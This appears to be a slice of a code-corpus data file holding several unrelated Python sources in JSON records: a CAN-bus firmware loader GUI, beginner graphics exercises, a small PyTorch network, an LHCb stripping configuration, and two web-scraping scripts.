self.labelStatus['text'] = \"Programming\"\n self.labelStatus.config(bg=\"blue\")\n return\n\n def FirmwareReaderFunction(self, saveFilePath):\n try:\n current_device = self.comboboxFoundCanDevices.current()\n self.canLoaderController.move_mcu_to_bootloader(current_device)\n self.QueueThreadReadingService.empty()\n self.CurrentDeviceBootloaderState = te_CurrentDeviceBootloaderState.bs_InBootloader\n self.canLoaderController.download_firmware_file(current_device, saveFilePath, self.QueueProgressBar,\n self.QueueThreadReadingService)\n self.__workingAction = WorkingAction.wa_NONE\n self.__add_log_msg__(\"Reading completed successfully\")\n except CANfoxHardwareException as e:\n self.__add_log_msg__(\"Hardware error: \" + str(e))\n self.__workingAction = WorkingAction.wa_HARDWARE_ERROR\n except Exception as e:\n self.__add_log_msg__(\"Reading error: \" + str(e))\n self.__workingAction = WorkingAction.wa_ERROR\n else:\n self.__workingAction = WorkingAction.wa_NONE\n return\n\n def buttonReadFlashClick(self):\n filename = filedialog.asksaveasfilename(initialdir=\"/\", title=\"Select file to save encoded firmware data\",\n filetypes=((\"Encoded bin file\", \"*.bin\"), (\"All files\", \"*.*\")))\n if len(filename) != 0 and os.access(os.path.dirname(filename), os.W_OK):\n current_device = self.comboboxFoundCanDevices.current()\n self.canLoaderController.move_mcu_to_bootloader(current_device)\n self.__add_log_msg__(\"Move to bootloader: done.\")\n # creating new thread for sync operations\n self.__workingAction = WorkingAction.wa_DEVICE_READING\n self.__switch_controls__(te_OperationState.os_BEGIN)\n self.__add_log_msg__(\"Reading target...\")\n Thread(target=self.FirmwareReaderFunction, args=(filename,)).start()\n self.master.after(250, self.StatusBarUpdaterFunction)\n self.labelStatus['text'] = \"Reading\"\n self.labelStatus.config(bg=\"aqua\")\n else:\n if len(filename) != 0:\n self.__add_log_msg__(\"Loader not write permission for (administrator rights?): \" + str(filename))\n\n #events\n def comboboxFoundCanDevices_Selected(self, event):\n self.CurrentDeviceBootloaderState = te_CurrentDeviceBootloaderState.bs_Unknown\n\n return\n\n def comboboxCANSpeed_Selected(self, event):\n baudrate = self.comboboxCANSpeed['values'][self.comboboxCANSpeed.current()]\n self.settings.set(\"CAN\", \"BaudRate\", baudrate)\n return\n\n def comboboxCANOpenSelfId_Selected(self, event):\n nodeid = self.comboboxCANOpenSelfId['values'][self.comboboxCANOpenSelfId.current()]\n self.settings.set(\"CANOpen\", \"NodeID\", nodeid)\n return\n\n def client_exit(self):\n self.master.destroy()\n return\n\n\n\n\n\ndef WinMain():\n root = tk.Tk()\n # size of the window\n\n # MainApplication(root).pack(side=tk.TOP,fill=tk.BOTH,expand=tk.YES)\n app = MainApplication(root)\n # sizexx = app.winfo_width()\n\n\nif __name__ == \"__main__\":\n WinMain()\n\n\n\n '''def process_queue(self):\n try:\n while self.QueueIncomingMessages.qsize() > 0:\n msg = self.QueueIncomingMessages.get(0)\n s_data = \"\"\n for y in range(0, msg.by_len):\n s_data += \"[\" + str(y) + \"] = \" + str(hex(msg.aby_data[y])) + \"; \"\n self.flLstResults.insert(tk.END, \"l_id: \" + str(hex(msg.l_id)) + \" by_len: \" + str(\n msg.by_len) + \" by_msg_lost: \" + str(msg.by_msg_lost) +\n \" by_extended: \" + str(msg.by_extended) + \" by_remote: \" + str(\n msg.by_remote) + \" ul_tstamp: \" + str(msg.ul_tstamp) + \" Data = \" + s_data)\n #self.flLstResults.select_clear(self.flLstResults.size() - 2) # Clear the current selected item\n #self.flLstResults.select_set(tk.END) # Select the new item\n if self.flLstResults.size() > 100:\n self.flLstResults.delete(0)\n self.flLstResults.yview(tk.END) # Set the scrollbar to the end of the listbox\n except queue.Empty:\n pass #no data\n self.master.after(100, self.process_queue)\n'''\n\n '''self.sieca_lib = sieca132_client()\n\n l_netnumber = 105\n l_txtimeout = -1\n l_rxtimeout = -1\n\n c_canAppName = \"canAppName\"\n c_ReceiverEventName = \"RE1\"\n c_ErrorEventName = \"EE1\"\n\n d_retval = self.sieca_lib.canOpen(l_netnumber, 0, 0, l_txtimeout, l_rxtimeout, c_canAppName,\n c_ReceiverEventName, c_ErrorEventName)\n # self.flLstResults.insert(tk.END, CANTypeDefs.ReturnValues(d_retval[\"l_retval\"]), d_retval[\"handle\"])\n self.siecaLibHandle = d_retval[\"handle\"]\n # siecaDllInfo = CANTypeDefs.st_InternalDLLInformation()\n # res = self.sieca_lib.canGetDllInfo(ctypes.addressof(siecaDllInfo))\n self.flLstResults.insert(tk.END, \"sieca_lib: \" + str(self.sieca_lib))\n # self.flLstResults.insert(tk.END, CANTypeDefs.ReturnValues(res))\n # self.flLstResults.insert(tk.END, siecaDllInfo.aui_TxCounter)\n\n l_retval = self.sieca_lib.canSetBaudrate(self.siecaLibHandle,\n int(CANTypeDefs.Baudrate.BAUD_250)) # 250 kbits/sec\n self.flLstResults.insert(tk.END, \"Set Baudrate: \" + str(CANTypeDefs.ReturnValues(l_retval)))\n sleep(5)\n l_retval = self.sieca_lib.canBlinkLED(self.siecaLibHandle, 0, 0b111, 0b101)\n self.flLstResults.insert(tk.END, \"LED flashing settings applied: \" + str(CANTypeDefs.ReturnValues(l_retval)))\n l_retval = self.sieca_lib.canIsNetOwner(d_retval[\"handle\"])\n self.flLstResults.insert(tk.END, \"CanIsNetOwner: \" + str(CANTypeDefs.ReturnValues(l_retval)))\n\n l_retval = self.sieca_lib.canSetFilterMode(self.siecaLibHandle, CANTypeDefs.T_FILTER_MODE.filterMode_nofilter)\n self.flLstResults.insert(tk.END, \"CanSetFilterMode: \" + str(CANTypeDefs.ReturnValues(l_retval)))\n message_reader = ThreadCANMsgReader(self.siecaLibHandle, self.sieca_lib, self.QueueIncomingMessages)\n message_reader.start()\n # d_retval = self.sieca_lib.canRead(self.siecaLibHandle)\n # self.flLstResults.insert(tk.END, \"DataCount: \" + str(d_retval[\"l_len\"]))\n # self.flLstResults.insert(tk.END, \"DataCount: \" + str(CANTypeDefs.ReturnValues(d_retval[\"l_retval\"])))\n\n self.process_queue()'''\n\n '''for x in range(0, d_retval[\"l_len\"].value):\n canmessage = d_retval[\"canmsg\"][x]\n # canmessage.aby_data\n s_data = \"\"\n for y in range(0, canmessage.by_len):\n s_data += \"[\" + str(y) + \"] = \" + str(hex(canmessage.aby_data[y])) + \"; \"\n\n self.flLstResults.insert(tk.END, \"l_id: \" + str(hex(canmessage.l_id)) + \" by_len: \" + str(\n canmessage.by_len) + \" by_msg_lost: \" + str(canmessage.by_msg_lost) +\n \" by_extended: \" + str(canmessage.by_extended) + \" by_remote: \" + str(\n canmessage.by_remote) + \" ul_tstamp: \" + str(canmessage.ul_tstamp) + \" Data = \" + s_data)\n\n # l_retval = sieca_lib.canClose(d_retval[\"handle\"])\n # self.flLstResults.insert(tk.END, CANTypeDefs.ReturnValues(l_retval))\n '''","sub_path":"CANLoaderMainWindow.py","file_name":"CANLoaderMainWindow.py","file_ext":"py","file_size_in_byte":47634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"465207899","text":"from graphics import *\nimport math\n\n\ndef drawStickFigure():\n win = GraphWin(\"Stick figure\")\n head = Circle(Point(100, 60), 20)\n head.draw(win)\n body = Line(Point(100, 80), Point(100, 120))\n body.draw(win)\n arms = Line(Point(75,95), Point(125,95))\n arms.draw(win)\n legl = Line(Point(75,145), Point(100,120))\n legl.draw(win)\n legr = Line(Point(125,145),Point(100,120))\n legr.draw(win)\n win.mainloop()\n\n\ndef drawLine():\n win = GraphWin(\"Line drawer\")\n for i in range(10):\n message = Text(Point(100,10), \"Click on first point\")\n message.draw(win)\n p1 = win.getMouse()\n message.setText(\"Click on second point\")\n p2 = win.getMouse()\n line = Line(p1, p2)\n line.draw(win)\n message.setText(\"\")\n win.mainloop()\n\n\ndef drawCircle():\n rad = eval(input(\"What is the radius: \"))\n win = GraphWin(\"Circle\")\n circle = Circle(Point(100,100), rad)\n circle.draw(win)\n win.mainloop()\n\n\ndef drawArcheryTarget():\n win = GraphWin(\"Archery Target\", 200, 200)\n center = Point(100,100)\n white = Circle(center, 75)\n white.setFill(\"white\")\n white.draw(win)\n black = Circle(center,60)\n black.setFill(\"black\")\n black.draw(win)\n blue = Circle(center, 45)\n blue.setFill(\"blue\")\n blue.draw(win)\n red = Circle(center,30)\n red.setFill(\"red\")\n red.draw(win)\n yellow = Circle(center, 15)\n yellow.setFill(\"yellow\")\n yellow.draw(win)\n win.mainloop()\n\n\ndef drawRectangle():\n height = eval(input(\"Height of the rectangle: \"))\n width = eval(input(\"Width of the rectangle: \"))\n win = GraphWin(\"Rectangle\", 200, 200)\n ul = Point((100-(width/2)),(100-(height/2)))\n br = Point((100+(width/2)),(100+(height/2)))\n rect = Rectangle(ul,br)\n rect.draw(win)\n win.mainloop()\n\n\ndef blueCircle():\n win = GraphWin(\"Blue Circle\")\n while True:\n p = win.getMouse()\n cen = Point(p.getX(),p.getY())\n c = Circle(cen, 50)\n c.setFill(\"blue\")\n c.draw(win)\n win.mainloop()\n\n\ndef tenStrings():\n win = GraphWin(\"Ten Strings\")\n msg = Entry(Point(100,10), 10)\n msg.draw(win)\n for i in range(10):\n p = win.getMouse()\n cen = Point(p.getX(), p.getY())\n msgstr = Text(cen, msg.getText())\n msgstr.draw(win)\n win.mainloop()\n\n\ndef tenColouredRectangles():\n win = GraphWin(\"10 Rectangles\")\n col = Entry(Point(100,10), 10)\n col.setText(\"blue\")\n col.draw(win)\n for i in range(10):\n p = win.getMouse()\n tl = Point(p.getX(), p.getY())\n p = win.getMouse()\n br = Point(p.getX(), p.getY())\n r = Rectangle(tl,br)\n r.setFill(col.getText())\n r.draw(win)\n win.mainloop()\n\n\ndef fiveClickStickFigure():\n win = GraphWin(\"Stick Figure\")\n p = win.getMouse()\n x1 = p.getX()\n y1 = p.getY()\n cen = Point(x1,y1)\n p = win.getMouse()\n dis = math.sqrt((p.getX() - x1)**2 + (p.getY() - y1)**2)\n c = Circle(cen, dis)\n c.draw(win)\n p = win.getMouse()\n bottom = p.getY()\n body = Line(Point(x1,(y1+dis)), Point(x1, p.getY()))\n body.draw(win)\n p = win.getMouse()\n arm = Line(Point(x1, p.getY()), Point(p.getX(), p.getY()))\n dis = p.getX() - x1\n arm2 = Line(Point(x1, p.getY()), Point(x1 - dis, p.getY()))\n arm.draw(win)\n arm2.draw(win)\n p = win.getMouse()\n leg = Line(Point(p.getX(), p.getY()), Point(x1, bottom))\n dis = p.getX() - x1\n leg2 = Line(Point(x1, bottom), Point(x1 - dis, p.getY()))\n leg.draw(win)\n leg2.draw(win)\n win.mainloop()\n\n\ndef plotRainfall():\n win = GraphWin(\"Rainfall\", 220, 220)\n numin = Entry(Point(110,10),5)\n msg = Text(Point(110,30), \"Click to Plot\")\n msg.draw(win)\n numin.draw(win)\n x1 = 25\n x2 = 50\n y1 = 200\n for i in range(7):\n p = win.getMouse() #wait for a mouse click\n y2 = eval(numin.getText())*2 #get height of bar\n y2 = y1 - y2 #have second coord above first\n bcord = Point(x1,y1) #set bottom coord\n tcord = Point(x2, y2) #set top coord\n bar = Rectangle(bcord, tcord) #create rectangle\n bar.setFill(\"blue\") #set rectangle colour to blue\n num = Text(Point(x1 + 12, y1 + 10), numin.getText()) #create label of bar height\n num.draw(win) #draw label\n x1 += 25 #move x-coords across for next bar\n x2 += 25 #move x-coords across for next bar\n bar.draw(win) #draw rectangle\n win.mainloop()\n\n#drawStickFigure()\n#drawLine()\n#drawCircle()\n#drawArcheryTarget()\n#drawRectangle()\n#blueCircle()\n#tenStrings()\n#tenColouredRectangles()\nfiveClickStickFigure()\n#plotRainfall()","sub_path":"Uni Work/Jake/Prac - 3.py","file_name":"Prac - 3.py","file_ext":"py","file_size_in_byte":4625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"160488911","text":"import torch.nn.functional as F\nimport torch as tc\nimport numpy as np\n\nclass SimpleNet(tc.nn.Module):\n def __init__(self,dropout,features=3):\n super(SimpleNet,self).__init__()\n self.is_training=False\n self.conv1=tc.nn.Conv2d(features,8,kernel_size=(5,5))\n self.conv2=tc.nn.Conv2d(8,8,kernel_size=(3,3))\n self.drop=tc.nn.Dropout(dropout)\n # Net created for input_files 16*16\n self.fc1=tc.nn.Linear(100*8,256)\n self.fc2=tc.nn.Linear(256,1)\n\n def forward(self,x):\n x = F.relu(self.conv1(x))\n x = F.relu(self.conv2(x))\n x = x.view(-1,100*8)\n if self.is_training:\n x = self.drop(x)\n x = F.relu(self.fc1(x))\n if self.is_training:\n x = self.drop(x)\n x= tc.sigmoid(self.fc2(x))\n #x = self.fc2(x)\n return x","sub_path":"NeuralNets.py","file_name":"NeuralNets.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"612416124","text":"'''\nD -> phi pi cross-section lines\n\nAdapted to current stripping framework by P. Spradlin.\n'''\n\n__author__ = ['Conor Fitzpatrick', 'Patrick Spradlin']\n__date__ = '03/09/2010'\n__version__ = '$Revision: 1.4 $'\n\n__all__ = ( 'StrippingD2PhiPiForXSecConf',\n 'makePhi2KK',\n 'makeD2PhiPi',\n 'default_config' )\n\n\nfrom Gaudi.Configuration import *\nfrom StrippingConf.StrippingLine import StrippingLine\nfrom GaudiKernel.SystemOfUnits import MeV, mrad\nfrom LHCbKernel.Configuration import *\n#from Configurables import FilterDesktop, CombineParticles\nfrom GaudiConfUtils.ConfigurableGenerators import FilterDesktop, CombineParticles\nfrom PhysSelPython.Wrappers import Selection\nfrom StrippingUtils.Utils import LineBuilder\nimport StandardParticles\nif hasattr(StandardParticles, \"StdAllNoPIDsPions\"):\n from StandardParticles import StdAllNoPIDsPions\nelse:\n from StandardParticles import StdNoPIDsPions as StdAllNoPIDsPions\nif hasattr(StandardParticles, \"StdAllNoPIDsKaons\"):\n from StandardParticles import StdAllNoPIDsKaons\nelse:\n from StandardParticles import StdNoPIDsKaons as StdAllNoPIDsKaons\n \nclass StrippingD2PhiPiForXSecConf(LineBuilder): # {\n\n __configuration_keys__ = ( 'K_BPVIPCHI2_MIN'\n , 'Pi_BPVIPCHI2_MIN'\n , 'K_PIDK_MIN'\n , 'Phi_M_MIN'\n , 'Phi_M_MAX'\n , 'D_AM_MIN'\n , 'D_AM_MAX'\n , 'D_VCHI2VDOF_MAX'\n , 'D_acosBPVDIRA_MAX'\n , 'D_PVDispCut'\n , 'HltFilter'\n , 'PrescaleD2PhiPi'\n , 'PostscaleD2PhiPi'\n )\n\n\n ## Possible parameters and default values copied from the definition\n ## of StrippingLine\n def _strippingLine ( self,\n name , # the base name for the Line\n prescale = 1.0 , # prescale factor\n ODIN = None , # ODIN predicate\n L0DU = None , # L0DU predicate\n HLT = None , # HltDecReports predicate\n FILTER = None , # 'VOID'-predicate, e.g. Global Event Cut\n checkPV = True , # Check PV before running algos\n algos = None , # the list of stripping members\n selection = None ,\n postscale = 1.0 , # postscale factor\n MaxCandidates = \"Override\", # Maxumum number\n MaxCombinations = \"Override\", # Maxumum number\n HDRLocation = None ) : # other configuration parameters\n # {\n\n if (prescale > 0) and (postscale > 0) : # {\n line = StrippingLine( name,\n prescale = prescale,\n ODIN = ODIN,\n L0DU = L0DU,\n HLT = HLT,\n FILTER = FILTER,\n checkPV = checkPV,\n algos = algos,\n selection = selection,\n postscale = postscale,\n MaxCandidates = MaxCandidates,\n MaxCombinations = MaxCombinations,\n HDRLocation = HDRLocation )\n\n self.registerLine(line)\n return line\n # }\n else : \n return False\n\n # }\n\n\n def __init__(self, name, config) : # {\n\n LineBuilder.__init__(self, name, config)\n\n phi2KK_name = name + 'Phi2KK'\n d2PhiPi_name = name + 'D2PhiPi'\n\n self.inPions = StdAllNoPIDsPions\n self.inKaons = StdAllNoPIDsKaons\n\n self.selPhi2KK = makePhi2KK( name = phi2KK_name\n , inputSel = [ self.inPions, self.inKaons ]\n , Daug_BPVIPCHI2_MIN = config['K_BPVIPCHI2_MIN']\n , K_PIDK_MIN = config['K_PIDK_MIN']\n , Comb_M_MIN = config['Phi_M_MIN']\n , Comb_M_MAX = config['Phi_M_MAX']\n )\n\n self.selD2PhiPi = makeD2PhiPi( name = d2PhiPi_name \n , inputSel = [ self.selPhi2KK, self.inPions ]\n , Pi_BPVIPCHI2_MIN = config['Pi_BPVIPCHI2_MIN']\n , Comb_AM_MIN = config['D_AM_MIN']\n , Comb_AM_MAX = config['D_AM_MAX']\n , D_acosBPVDIRA_MAX = config['D_acosBPVDIRA_MAX']\n , D_PVDispCut = config['D_PVDispCut']\n , D_VCHI2VDOF_MAX = config['D_VCHI2VDOF_MAX']\n )\n\n\n self.line_D2PhiPi = self._strippingLine( name = d2PhiPi_name + 'Line',\n HLT = config['HltFilter'],\n prescale = config['PrescaleD2PhiPi'],\n postscale = config['PostscaleD2PhiPi'],\n selection = self.selD2PhiPi\n )\n # }\n\n# }\n\n\ndef makePhi2KK( name\n , inputSel\n , Daug_BPVIPCHI2_MIN\n , K_PIDK_MIN\n , Comb_M_MIN\n , Comb_M_MAX\n , decDescriptors = [ \"phi(1020) -> K+ K-\" ]\n ) : # {\n\n ## Construct a preambulo to simplify some calculations.\n lclPreambulo = [\n \"pidFiducialPMin = 3.0 * GeV\"\n , \"pidFiducialPMax = 100.0 * GeV\"\n ]\n\n daugCuts = \"(HASRICH)\" \\\n \"& (in_range(pidFiducialPMin, P, pidFiducialPMax))\" \\\n \"& (in_range(2.0, ETA, 5.0))\" \\\n \"& ((PIDK-PIDpi) > %(K_PIDK_MIN)s)\" \\\n \"& (BPVIPCHI2() > %(Daug_BPVIPCHI2_MIN)s)\" % locals()\n\n combCuts = \"(AALL)\"\n\n phiCuts = \"(in_range(%(Comb_M_MIN)s, M, %(Comb_M_MAX)s))\" % locals()\n\n\n _phi = CombineParticles(\n DecayDescriptors = decDescriptors\n , Preambulo = lclPreambulo\n , DaughtersCuts = { \"K+\" : daugCuts }\n , CombinationCut = combCuts\n , MotherCut = phiCuts \n )\n\n return Selection( name,\n Algorithm = _phi,\n RequiredSelections = inputSel\n )\n\n# }\n\n\ndef makeD2PhiPi( name\n , inputSel\n , Pi_BPVIPCHI2_MIN\n , Comb_AM_MIN\n , Comb_AM_MAX\n , D_acosBPVDIRA_MAX\n , D_PVDispCut\n , D_VCHI2VDOF_MAX\n , decDescriptors = [ \"[D_s+ -> pi+ phi(1020)]cc\" ]\n ): # {\n\n ## Construct a preambulo to simplify some calculations.\n lclPreambulo = [\n \"from math import cos\"\n , \"bpvdirathresh = cos(%(D_acosBPVDIRA_MAX)s)\" % locals()\n ]\n\n phiCuts = \"(ALL)\"\n piCuts = \"(BPVIPCHI2() > %(Pi_BPVIPCHI2_MIN)s)\" % locals()\n\n combCuts = \"(in_range(%(Comb_AM_MIN)s, AM, %(Comb_AM_MAX)s))\" % locals()\n\n dCuts = \"(VFASPF(VCHI2/VDOF) < %(D_VCHI2VDOF_MAX)s)\" \\\n \"& (%(D_PVDispCut)s)\" \\\n \"& (BPVDIRA > bpvdirathresh) \" % locals()\n\n _dplus = CombineParticles(\n DecayDescriptors = decDescriptors\n , Preambulo = lclPreambulo\n , DaughtersCuts = { \"pi+\" : piCuts, \"phi(1020)\" : phiCuts }\n , CombinationCut = combCuts\n , MotherCut = dCuts\n )\n\n return Selection( name,\n Algorithm = _dplus,\n RequiredSelections = inputSel\n )\n\n# }\n\n\ndefault_config = {\n 'K_BPVIPCHI2_MIN' : 1.0\n , 'Pi_BPVIPCHI2_MIN' : 1.0\n , 'K_PIDK_MIN' : 0.0\n , 'Phi_M_MIN' : 1000.0 * MeV\n , 'Phi_M_MAX' : 1040.0 * MeV\n , 'D_AM_MIN' : 1770.0 * MeV\n , 'D_AM_MAX' : 2070.0 * MeV\n , 'D_VCHI2VDOF_MAX' : 25.0\n , 'D_acosBPVDIRA_MAX' : 35.0 * mrad\n , 'D_PVDispCut' : \"((BPVVDCHI2 > 16.0)|(BPVLTIME() > 0.150 * picosecond))\"\n , 'HltFilter' : None\n #\n , 'PrescaleD2PhiPi' : 1.0\n , 'PostscaleD2PhiPi' : 1.0\n }\n\n\n","sub_path":"DaVinciDev_v38r1p1/Phys/StrippingArchive/python/StrippingArchive/Stripping20r2/StrippingD2PhiPiForXSec.py","file_name":"StrippingD2PhiPiForXSec.py","file_ext":"py","file_size_in_byte":8902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"428348387","text":"import bs4\nimport requests\nimport lxml\nimport html5lib\nimport pandas as pd\nimport re\nimport csv\n\n#Varible and arrays\nargument_array = []\nargument_desc_array = []\nvalue = []\n\n#get gata from web\nres = requests.get('https://scikit-learn.org/stable/modules/generated/sklearn.svm.SVC.html')\nsoup = bs4.BeautifulSoup(res.text, 'html5lib')\nargument = soup.find('td',class_='field-body')\n\n#Extract arguments\nfor arg in argument.find_all('strong'):\n argument_array.append(arg.text)\n\n#Extract argument description\nfor arg in argument.find_all('dd'):\n argument_desc_array.append(arg.text.replace('\\n',' ').replace('\\t', ''))\n\n#Extract default value with argument\nfor val in argument.find_all('dt'):\n value.append(val.text)\n\nregex = r\"\\(default=.*?\\)|(default:.*)|(default=.*)|\\(default =.*?\\)|(default.*)\"\n\ndefault_value = [None] * len(argument_array)\n\n#Extract default values\nfor i, val in enumerate(value):\n if(val.count('default')==1):\n temp = re.search(regex, value[i]).group()\n temp = temp.replace('default','').replace('=','').replace('(','').replace(')','').replace(':','')\n default_value[i] = temp\n\n#save data\ndf = pd.DataFrame({\"Argument\" : argument_array, \"Description\" : argument_desc_array, \"Default_value\" : default_value})\ndf.to_csv(\"SK_output.csv\", index=False )\n","sub_path":"Performance_Evaluation/SK_WebScraper.py","file_name":"SK_WebScraper.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"156920091","text":"# Mission to Mars\r\n\r\n#Import dependencies\r\n\r\nfrom splinter import Browser\r\nfrom bs4 import BeautifulSoup\r\nimport requests\r\nimport pymongo\r\nimport tweepy\r\nimport json\r\nimport pandas as pd\r\nimport time \r\n\r\ndef init_browser():\r\n executable_path = {\"executable_path\": \"/Users/stefa/chromedriver.exe\"}\r\n return Browser(\"chrome\", **executable_path, headless=False)\r\n\r\ndef scrape():\r\n \r\n #Create the dictionary that will store all of the Mars information we scrape\r\n mars_data = {}\r\n \r\n #scrape Nasa data\r\n headline, teaser, date = scrape_mars_headline()\r\n\r\n mars_data[\"nasa_headline\"] = headline\r\n mars_data[\"nasa_teaser\"] = teaser\r\n mars_data[\"nasa_date\"] = date\r\n \r\n #scape JPL for featured image\r\n featured_image = scrape_JPL_image()\r\n mars_data[\"featured_image\"] = featured_image\r\n \r\n #scrape Twitter for the latest Mars weather tweet\r\n mars_weather = mars_weather_tweet()\r\n mars_data[\"weather\"] = mars_weather\r\n \r\n #scrape Mars Facts website to store basic facts on the planet\r\n facts_html_table = mars_facts()\r\n mars_data[\"facts_table\"] = facts_html_table\r\n \r\n #scrape USGS to get images for each of Mars' hemispheres\r\n hemisphere_images = mars_hemispheres()\r\n mars_data[\"hemi_img\"] = hemisphere_images\r\n \r\n return mars_data\r\n\r\n\r\ndef scrape_mars_headline():\r\n\r\n #This function scrapes the Nasa website for the latest news headline\r\n\r\n browser = init_browser()\r\n \r\n # visit https://mars.nasa.gov/news/\r\n mars_news = \"https://mars.nasa.gov/news/\"\r\n browser.visit(mars_news)\r\n \r\n #store the html in a variable called html \r\n html = browser.html\r\n\r\n # create a soup object from the html. This will parse the html we pulled from Nasa website.\r\n soup = BeautifulSoup(html, \"html.parser\")\r\n \r\n #Get the latest article posted on the site. The list_text class has the headline,\r\n # date, and a blurb about the article - \"a teaser\"\r\n \r\n mars_article = soup.find('div', class_='list_text')\r\n\r\n #Now that we have the article, we can get the headline, blurb, and date\r\n mars_headline = mars_article.find('div', class_='content_title').text\r\n mars_teaser = mars_article.find('div', class_='article_teaser_body').text\r\n mars_news_date = mars_article.find('div', class_='list_date').text\r\n \r\n return mars_headline, mars_teaser, mars_news_date \r\n\r\ndef scrape_JPL_image():\r\n \r\n #This function scrapes the JPL website for an image of Mars\r\n\r\n browser = init_browser()\r\n\r\n # visit https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars\r\n mars_jpl = \"https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars\"\r\n \r\n browser.visit(mars_jpl)\r\n\r\n #store the html in a variable called html \r\n html = browser.html\r\n\r\n #click on the button that says \"FULL IMAGE\"\r\n browser.click_link_by_partial_text('FULL IMAGE')\r\n\r\n time.sleep(2)\r\n\r\n #now click on the link that says \"more info\"\r\n browser.click_link_by_partial_text('more info')\r\n\r\n time.sleep(2)\r\n\r\n #we're on a new page so we need to scrape the html again\r\n new_html = browser.html\r\n\r\n #make a beautifulsoup object for the new page\r\n soup = BeautifulSoup(new_html, \"html.parser\")\r\n\r\n image_detail = soup.find('img', class_='main_image')\r\n\r\n full_res_jpeg = image_detail.get('src')\r\n\r\n #now append the jpl nasa front end link\r\n jpl = \"https://www.jpl.nasa.gov\"\r\n\r\n featured_image_url = jpl + full_res_jpeg\r\n\r\n print(f\"JPL Featured Image: {featured_image_url}\")\r\n \r\n return featured_image_url\r\n\r\ndef mars_weather_tweet():\r\n \r\n #get mars weather's latest tweet from the website\r\n\r\n browser = init_browser()\r\n\r\n weather_url = \"https://twitter.com/marswxreport?lang=en\"\r\n browser.visit(weather_url)\r\n\r\n html_weather = browser.html\r\n\r\n soup = BeautifulSoup(html_weather, \"html.parser\")\r\n\r\n mars_weather = soup.find(\"p\", class_=\"TweetTextSize TweetTextSize--normal js-tweet-text tweet-text\").text\r\n\r\n print(f\"Latest Weather Tweet: {mars_weather}\")\r\n \r\n return mars_weather\r\n\r\ndef mars_facts():\r\n\r\n #scrape the space-facts website to get basic data on the planet Mars\r\n\r\n #store the URL for the space facts website\r\n facts_url = \"https://space-facts.com/mars/\"\r\n\r\n #Use pandas to scrape the page for table data\r\n tables = pd.read_html(facts_url)\r\n tables\r\n\r\n facts_df = tables[0]\r\n facts_df.columns = ['Fact Type', 'Fact Data']\r\n facts_df\r\n \r\n #Convert the dataframe to an HTML table string\r\n\r\n facts_html_table = facts_df.to_html(header=False, index=False)\r\n\r\n\r\n #strip the \\n characters\r\n facts_html_table = facts_html_table.replace('\\n', '')\r\n \r\n print(facts_html_table)\r\n \r\n return facts_html_table\r\n\r\ndef mars_hemispheres():\r\n\r\n #scrape the entire 'collapsible results' class so that we can loop through each item\r\n\r\n #set the browser variable\r\n browser = init_browser()\r\n\r\n # visit https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars\r\n mars_usgs_url = \"https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars\"\r\n browser.visit(mars_usgs_url)\r\n\r\n\r\n #store the html in a variable called usgs_html \r\n usgs_html = browser.html\r\n\r\n # create a soup object from the html. This will parse the html we pulled from USGS website.\r\n usgs_soup = BeautifulSoup(usgs_html, \"html.parser\")\r\n\r\n #Get the URL for the featured image-full size\r\n\r\n product_box = usgs_soup.find('div', class_='collapsible results')\r\n\r\n #create lists to hold the partial and full links to each hemisphere's page\r\n hemi_links = []\r\n hemi_urls = []\r\n\r\n #pre-load the hemi array because the page is permanently down\r\n\r\n hemisphere_image_urls = [{\"title\" : \"Cerberus Hemisphere\", \"image\" : \"http://astropedia.astrogeology.usgs.gov/download/Mars/Viking/cerberus_enhanced.tif/full.jpg\"},\r\n {\"title\" : \"Schiaparelli Hemisphere\", \"image\" : \"http://astropedia.astrogeology.usgs.gov/download/Mars/Viking/schiaparelli_enhanced.tif/full.jpg\"},\r\n {\"title\" : \"Syrtis Major Hemisphere\", \"image\" : \"http://astropedia.astrogeology.usgs.gov/download/Mars/Viking/syrtis_major_enhanced.tif/full.jpg\"},\r\n {\"title\" : \"Valles Marineris Hemisphere\", \"image\" : \"http://astropedia.astrogeology.usgs.gov/download/Mars/Viking/valles_marineris_enhanced.tif/full.jpg\"}]\r\n\r\n\r\n if product_box:\r\n\r\n hemisphere_image_urls = []\r\n\r\n for item in product_box.find_all('div', class_='item'):\r\n hemi_links.append(item.find('a').get('href'))\r\n\r\n #beginning of url to append\r\n link_beg = \"https://astrogeology.usgs.gov\"\r\n\r\n #create a new list to store the entire url string\r\n for link in hemi_links:\r\n link = link_beg + link\r\n hemi_urls.append(link)\r\n\r\n #visit each hemisphere's links using Splinter and get the images\r\n #Create an empty list to store the dictionaries for all hemispheres\r\n hemisphere_image_urls = []\r\n\r\n #Create an empty list to store the title and image link for each hemisphere\r\n hemi_dict = {}\r\n\r\n for url in hemi_urls:\r\n browser.visit(url)\r\n hemi_html = browser.html\r\n\r\n # create a soup object from the html. \r\n hemi_soup = BeautifulSoup(hemi_html, \"html.parser\")\r\n\r\n #store the title\r\n title = hemi_soup.find('h2', class_='title').text\r\n title = title.replace(' Enhanced', '')\r\n \r\n print(f\"Hemisphere: {title}\")\r\n\r\n #go to the downloads section to get the list of images and pick the full image\r\n hemi_download = hemi_soup.find('div', class_='downloads')\r\n hemi_list = hemi_download.find('li')\r\n hemi_image = hemi_list.a['href']\r\n \r\n print(f\"Image: {hemi_image}\")\r\n\r\n hemi_dict = {'title' : title, 'image' : hemi_image}\r\n\r\n hemisphere_image_urls.append(hemi_dict)\r\n\r\n return hemisphere_image_urls\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n","sub_path":"huckleberry-mission-to-mars/scrape_mars.py","file_name":"scrape_mars.py","file_ext":"py","file_size_in_byte":8068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"232396368","text":"# -*- coding: utf-8 